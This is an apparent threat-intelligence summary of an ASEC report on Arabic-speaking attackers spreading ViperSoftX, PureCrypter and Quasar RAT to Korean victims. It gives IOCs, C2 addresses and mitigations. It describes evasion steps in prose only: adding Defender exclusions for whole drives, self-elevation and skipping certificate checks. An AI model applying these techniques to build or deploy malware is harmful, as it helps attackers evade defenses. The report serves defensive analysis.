Full Report
AhnLab SEcurity intelligence Center (ASEC) uncovered that attackers, suspected to be Arabic speakers, have been distributing ViperSoftX malware targeting Korean victims since April 1, 2025. ViperSoftX is typically spread through cracked software or torrents, masquerading as legitimate programs. The main characteristic of ViperSoftX is that it operates as a PowerShell script. During the C&C communication […]
Analysis Summary
# Threat Actor: Arabic-Speaking Threat Actor (Distributing ViperSoftX)
## Attribution & Identity
The actor is suspected to be Arabic-speaking, a conclusion drawn from the presence of Arabic comments within the PowerShell and VBS code used for Command and Control (C&C) communication. No specific threat group name is attributed, only the linguistic signature identified by ASEC.
## Activity Summary
The threat actor has been actively distributing **ViperSoftX** malware, targeting **Korean victims** since at least April 1, 2025. The initial distribution vector for ViperSoftX in this campaign is currently unclear, but the malware is generally spread via cracked software or torrents, masquerading as legitimate programs. The execution chain involves ViperSoftX dropping a VBS downloader, which subsequently executes a PowerShell script to fetch and deploy secondary malware, including PureCrypter and Quasar RAT.
## Tactics, Techniques & Procedures
- **Initial Access:** Distribution via cracked software or torrents (though source unclear in this specific campaign).
- **Execution:** Execution chain relying on a PowerShell script (ViperSoftX), VBScript downloader (`vbs.vbs`), and a PowerShell downloader (`a.ps1`).
- **Persistence/Defense Evasion:** The PowerShell downloader adds **Windows Defender exception paths** (specifically C: and D: drives) to evade detection.
- **Privilege Escalation:** The PowerShell downloader checks for administrator privileges and re-executes itself with elevated rights if necessary.
- **Command and Control (C2):** C&C communication uses specific URI paths: `/api/`, `/api/v1`, `/api/v2`, and `/api/v3/`. The secondary malware (PureCrypter) uses the **protobuf library** for serialization during C\&C communication.
- **Lateral Movement/Payload Delivery:** The actor downloads and executes additional malware, including downloaders (PureCrypter) and Remote Access Trojans (Quasar RAT).
- **Code Obfuscation/Language Markers:** Use of **Arabic comments** within the scripts to indicate developer origin.
- **Protocol Usage:** Use of **TLS 1.2** and bypassing server certificate validation during communication.
## Targeting
- **Sectors:** Not explicitly detailed, but the generic nature of the distribution implies broad targeting initially.
- **Geography:** South Korea (Korean victims).
- **Victims:** Not specifically named organizations, but a broad range of targets in South Korea.
## Tools & Infrastructure
- **Malware Families Used:**
- **ViperSoftX:** The core initial payload, operating as a PowerShell script.
- **VBS Downloader (`vbs.vbs`):** Used to launch the next stage scripts.
- **Powershell Downloader (`a.ps1`):** Responsible for privilege escalation, defense evasion, and downloading final payloads.
- **PureCrypter:** Used as a downloader, noteworthy for using Protobuf for C&C serialization.
- **Quasar RAT:** An open-source .NET RAT used for remote control.
- **Infrastructure (C2 Addresses):**
- `89.117.79[.]31`:56005, `89.117.79[.]31`:56004, `89.117.79[.]31`:56003
- `65.109.29[.]234`:7702, `65.109.29[.]234`
- `136[.]243[.]132[.]112` (Identified IOC)
- **Dropped File Paths (Examples):**
- `%ALLUSERSPROFILE%\nvidia.exe`, `%ALLUSERSPROFILE%\teamviewer.exe`, `%ALLUSERSPROFILE%\temp.exe`, `%ALLUSERSPROFILE%\words.exe` (Associated with PureCrypter)
- `%ALLUSERSPROFILE%\winrar.exe`, `%ALLUSERSPROFILE%\micro.exe` (Associated with Quasar RAT)
- Creates folder: `C:\ProgramData\SystemLoader`
## Implications
This activity indicates a persistent threat actor, possibly using commercial tools (PureCrypter) combined with publicly available tools (Quasar RAT), targeting the South Korean victim base. The multi-stage infection chain, reliance on PowerShell, and specific C&C URI structures suggest a degree of sophistication aimed at achieving persistent remote access, likely for espionage or data exfiltration given the capabilities of Quasar RAT. Continuous monitoring is necessary as additional, unidentified malware may be deployed.
## Mitigations
- Users should strictly **avoid downloading software from torrent sites or using cracked programs**. Employ only legitimate software sources.
- Ensure **antivirus/endpoint detection solutions are updated** to the latest versions.
- Monitor for execution patterns involving PowerShell scripts that escalate privileges or bypass security controls.
- Implement detection rules specifically looking for communications utilizing the identified C&C URI patterns (`/api/`, `/api/v1`, etc.) or the use of the Protobuf library signature in network traffic.
- Restrict administrative rights for standard users.